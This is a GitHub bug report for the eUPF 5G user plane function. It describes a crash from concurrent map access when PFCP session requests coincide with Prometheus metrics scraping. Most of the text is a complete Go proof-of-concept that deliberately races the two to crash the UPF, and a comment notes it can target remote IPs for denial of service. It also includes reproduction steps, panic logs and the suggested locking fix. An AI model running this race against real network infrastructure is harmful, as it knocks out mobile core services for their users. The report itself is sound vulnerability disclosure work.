Skip to content

[Bug]: UPF crash due to concurrent map access in Prometheus metrics collection #634

@LinZiyuu

Description

@LinZiyuu

Describe the bug
The UPF crashes with a fatal concurrent map read/write error when PFCP Session Establishment Requests are processed at the same time as Prometheus metrics collection requests to /metrics, resulting in a denial of service (DoS).

To Reproduce
Steps to reproduce the behavior:

  1. Launch eUPF
sudo docker run -d --privileged --network host \
  -v /sys/fs/bpf:/sys/fs/bpf \
  -v /sys/kernel/debug:/sys/kernel/debug:ro \
  -e UPF_INTERFACE_NAME=lo \
  -e UPF_N3_ADDRESS=127.0.0.1 \
  -e UPF_PFCP_ADDRESS="0.0.0.0:8805" \
  -e UPF_PFCP_NODE_ID=127.0.0.1 \
  -e UPF_API_ADDRESS="0.0.0.0:8080" \
  -e UPF_METRICS_ADDRESS="0.0.0.0:9090" \
  --name eupf ghcr.io/edgecomllc/eupf:main
  2. Start a new Go project inside a new folder, then create a main.go and paste the code below:
mkdir poc && cd poc
go mod init poc
go get github.com/wmnsk/go-pfcp
  3. Create main.go:
package main

import (
	"context"
	"fmt"
	"log"
	"math/rand"
	"net"
	"net/http"
	"runtime"
	"sync"
	"time"

	"github.com/wmnsk/go-pfcp/ie"
	"github.com/wmnsk/go-pfcp/message"
)

// rnd is the package-level pseudo-random generator, seeded from the wall
// clock when the program starts. The request-building loops use it to vary
// the SEID, the numeric outer-header-creation argument and the UE IP octets
// of each request.
//
// NOTE: a *rand.Rand is not safe for concurrent use; do not share it across
// goroutines without external locking.
var rnd = rand.New(rand.NewSource(time.Now().UnixNano()))

// main drives the proof of concept. For a fixed 500ms window it runs one
// syncRace worker together with a small number of hammerEndpoint workers,
// waits for all of them to return, and then prints a closing hint.
func main() {
	const (
		runFor         = 500 * time.Millisecond
		metricsWorkers = 2
	)
	// NOTE: These can be changed to remote IPs for remote DoS attack
	// Example: pfcpAddr := "192.168.1.100:8805"
	var (
		pfcpAddr   = "127.0.0.1:8805"
		metricsURL = "http://127.0.0.1:9090/metrics"
	)

	// Every worker observes this context and stops once the window elapses.
	ctx, cancel := context.WithTimeout(context.Background(), runFor)
	defer cancel()

	var workers sync.WaitGroup
	// spawn runs task on its own goroutine and registers it with workers so
	// that Wait below blocks until the task has returned.
	spawn := func(task func()) {
		workers.Add(1)
		go func() {
			defer workers.Done()
			task()
		}()
	}

	spawn(func() { syncRace(ctx, pfcpAddr, metricsURL) })
	for n := 0; n < metricsWorkers; n++ {
		spawn(func() { hammerEndpoint(ctx, metricsURL) })
	}

	workers.Wait()
	log.Println("Optimized race PoC finished; check eUPF logs for concurrent map panic.")
}

// syncRace opens a PFCP connection to pfcpAddr, performs an association
// setup, and then loops until ctx is done. Each iteration fires an
// asynchronous GET at metricsURL and immediately sends a PFCP Session
// Establishment Request with a random SEID and UE IP address, so that the two
// requests reach the target as close together as possible.
//
// Dial and association failures are logged and end the function. Failures to
// send individual session requests do not stop the loop; they are counted and
// reported once when the function returns.
func syncRace(ctx context.Context, pfcpAddr, metricsURL string) {
	conn, err := dialPfcp(pfcpAddr)
	if err != nil {
		log.Printf("pfcp dial failed: %v", err)
		return
	}
	defer conn.Close()

	seq := uint32(1)
	if _, err := sendAssociation(conn, seq); err != nil {
		log.Printf("association setup failed: %v", err)
		return
	}

	httpClient := &http.Client{
		Timeout: 200 * time.Millisecond,
	}

	// Send errors are tallied rather than logged one by one: the loop spins
	// every few microseconds, so per-iteration logging would flood the output.
	var (
		sendFailures int
		lastSendErr  error
	)
	defer func() {
		if sendFailures > 0 {
			log.Printf("%d session establishment sends failed; last error: %v", sendFailures, lastSendErr)
		}
	}()

	for {
		select {
		case <-ctx.Done():
			return
		default:
		}

		// Fire-and-forget metrics request; it is bounded by the client
		// timeout, and its body is closed so the connection is released.
		go func() {
			resp, err := httpClient.Get(metricsURL)
			if err == nil {
				resp.Body.Close()
			}
		}()

		// OR-ing with 1 guarantees the random SEID is never zero.
		seid := rnd.Uint64() | 1
		req := message.NewSessionEstablishmentRequest(0, 0,
			seid, 1, 0,
			ie.NewNodeID("", "", "race-smf"),
			ie.NewFSEID(seid, net.ParseIP("127.0.0.1"), nil),
			ie.NewCreateFAR(
				ie.NewFARID(1),
				ie.NewApplyAction(2), // FORW
				ie.NewForwardingParameters(
					ie.NewDestinationInterface(ie.DstInterfaceCore),
					ie.NewOuterHeaderCreation(0x0100, rnd.Uint32(), "10.200.0.1", "", 0, 0, 0),
				),
			),
			ie.NewCreatePDR(
				ie.NewPDRID(1),
				ie.NewPrecedence(255),
				ie.NewPDI(
					ie.NewSourceInterface(ie.SrcInterfaceAccess),
					ie.NewUEIPAddress(2, fmt.Sprintf("10.60.%d.%d", rnd.Intn(200), rnd.Intn(200)), "", 0, 0),
				),
				ie.NewFARID(1),
			),
		)
		if err := sendMessage(conn, req); err != nil {
			sendFailures++
			lastSendErr = err
		}

		// Yield and pause briefly so the HTTP goroutine gets a chance to run
		// alongside the PFCP request.
		runtime.Gosched()
		time.Sleep(10 * time.Microsecond)
	}
}

// minimalRace is a bounded variant of the race loop: after a PFCP association
// setup it runs at most 1000 iterations (or until ctx is done), each one
// firing an asynchronous GET at metricsURL and sending a PFCP Session
// Establishment Request with a random SEID and UE IP address.
//
// Dial and association failures are logged and end the function.
func minimalRace(ctx context.Context, pfcpAddr, metricsURL string) {
	conn, err := dialPfcp(pfcpAddr)
	if err != nil {
		log.Printf("pfcp dial failed: %v", err)
		return
	}
	defer conn.Close()

	// Session requests are sent only after the association setup exchange has
	// succeeded, so stop here if it fails.
	if _, err := sendAssociation(conn, 1); err != nil {
		log.Printf("association setup failed: %v", err)
		return
	}
	httpClient := &http.Client{Timeout: 50 * time.Millisecond}

	for i := 0; i < 1000; i++ {
		select {
		case <-ctx.Done():
			return
		default:
		}

		// Fire-and-forget metrics request. The body must be closed on
		// success, otherwise every iteration leaks a connection.
		go func() {
			resp, err := httpClient.Get(metricsURL)
			if err == nil {
				resp.Body.Close()
			}
		}()

		// OR-ing with 1 guarantees the random SEID is never zero.
		seid := rnd.Uint64() | 1
		req := message.NewSessionEstablishmentRequest(0, 0,
			seid, 1, 0,
			ie.NewNodeID("", "", "race-smf"),
			ie.NewFSEID(seid, net.ParseIP("127.0.0.1"), nil),
			ie.NewCreateFAR(
				ie.NewFARID(1),
				ie.NewApplyAction(2),
				ie.NewForwardingParameters(
					ie.NewDestinationInterface(ie.DstInterfaceCore),
					ie.NewOuterHeaderCreation(0x0100, rnd.Uint32(), "10.200.0.1", "", 0, 0, 0),
				),
			),
			ie.NewCreatePDR(
				ie.NewPDRID(1),
				ie.NewPrecedence(255),
				ie.NewPDI(
					ie.NewSourceInterface(ie.SrcInterfaceAccess),
					ie.NewUEIPAddress(2, fmt.Sprintf("10.60.%d.%d", rnd.Intn(200), rnd.Intn(200)), "", 0, 0),
				),
				ie.NewFARID(1),
			),
		)
		// Deliberately best-effort: a single failed send only lowers the
		// request rate, so the loop keeps going.
		_ = sendMessage(conn, req)
		runtime.Gosched()
	}
}

// hammerEndpoint issues back-to-back GET requests against url until ctx is
// done. Every request is bounded by a 200ms client timeout; request errors
// are ignored, and successful responses are closed without being read.
func hammerEndpoint(ctx context.Context, url string) {
	poller := &http.Client{Timeout: 200 * time.Millisecond}
	// ctx.Err() turns non-nil exactly when ctx.Done() is closed, so this is a
	// non-blocking cancellation check before each request.
	for ctx.Err() == nil {
		if resp, err := poller.Get(url); err == nil {
			resp.Body.Close()
		}
	}
}

// dialPfcp resolves pfcpAddr as a UDP address and returns a UDP connection
// dialed to it from an automatically chosen local address. If the address
// cannot be resolved, it returns a nil connection and the resolution error.
func dialPfcp(pfcpAddr string) (*net.UDPConn, error) {
	remote, resolveErr := net.ResolveUDPAddr("udp", pfcpAddr)
	if resolveErr == nil {
		return net.DialUDP("udp", nil, remote)
	}
	return nil, resolveErr
}

// sendAssociation builds a PFCP Association Setup Request carrying sequence
// number seq, a "poc-smf" node ID, a recovery timestamp of the current time
// and an all-zero UP function features IE. It sends the request over conn
// and returns the parsed reply, or the error from the exchange.
func sendAssociation(conn *net.UDPConn, seq uint32) (message.Message, error) {
	nodeID := ie.NewNodeID("", "", "poc-smf")
	recovery := ie.NewRecoveryTimeStamp(time.Now())
	features := ie.NewUPFunctionFeatures(0, 0, 0)

	setupReq := message.NewAssociationSetupRequest(seq, nodeID, recovery, features)
	return sendAndReceive(conn, setupReq)
}

// sendMessage serialises msg into a buffer of exactly msg.MarshalLen() bytes
// and writes it to conn as a single datagram. It returns the marshalling
// error if serialisation fails, otherwise the result of the write.
func sendMessage(conn *net.UDPConn, msg message.Message) error {
	payload := make([]byte, msg.MarshalLen())
	err := msg.MarshalTo(payload)
	if err == nil {
		// Only attempt the write once the payload is fully encoded.
		_, err = conn.Write(payload)
	}
	return err
}

// sendAndReceive writes msg to conn and then waits up to 500ms for a single
// datagram in reply, which it parses as a PFCP message.
//
// It returns the parsed reply, or an error if sending, arming the read
// deadline, reading, or parsing fails. The first datagram received is parsed
// as the reply; it is not matched against msg.
func sendAndReceive(conn *net.UDPConn, msg message.Message) (message.Message, error) {
	if err := sendMessage(conn, msg); err != nil {
		return nil, err
	}

	// Without a deadline the read below could block indefinitely, so failing
	// to arm it aborts the exchange instead of being ignored.
	if err := conn.SetReadDeadline(time.Now().Add(500 * time.Millisecond)); err != nil {
		return nil, fmt.Errorf("setting read deadline: %w", err)
	}

	respBuf := make([]byte, 4096)
	n, _, err := conn.ReadFromUDP(respBuf)
	if err != nil {
		return nil, err
	}
	return message.Parse(respBuf[:n])
}
  4. Run the PoC:
go run main.go
  5. Check the eUPF logs for the panic:
sudo docker logs eupf

Expected behavior
The PFCP handler and Prometheus metrics collection handler must use proper synchronization mechanisms (e.g., mutexes, read-write locks, or sync.Map) when accessing shared metrics map structures. Concurrent map read and write operations should be prevented, and the UPF should gracefully handle concurrent requests without crashing.

Logs

fatal error: concurrent map iteration and map write

goroutine 34 [running]:
reflect.mapiternext(0x4a98e9?)
	/usr/local/go/src/runtime/map.go:1392 +0x13
reflect.(*MapIter).Next(0xc000312ee0?)
	/usr/local/go/src/reflect/value.go:2005 +0x74
encoding/json.mapEncoder.encode(...)
	/usr/local/go/src/encoding/json/encode.go:745 +0x334
...
github.com/edgecomllc/eupf/cmd/api/rest.(*ApiHandler).listPfcpAssociationsFull(...)
	/app/cmd/api/rest/pfcp_associations.go:45
...

goroutine 54 [runnable]:
github.com/prometheus/client_golang/prometheus.(*summary).Observe(0xc0000f57a0, 0x4047000000000000)
	/go/pkg/mod/github.com/prometheus/client_golang@v1.18.0/prometheus/summary.go:310 +0x8b
github.com/edgecomllc/eupf/cmd/core.PfcpHandlerMap.Handle(0xc0004ace10, 0xc0000fa380, {0xc0000aa000, 0x7b, 0x5dc}, 0xc0011b6240)
	/app/cmd/core/pfcp_handlers.go:35 +0x413

Environment (please complete the following information):

  • OS: Ubuntu 24.04
  • 5GC kind and version: None
  • UPF version: a8d774a

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions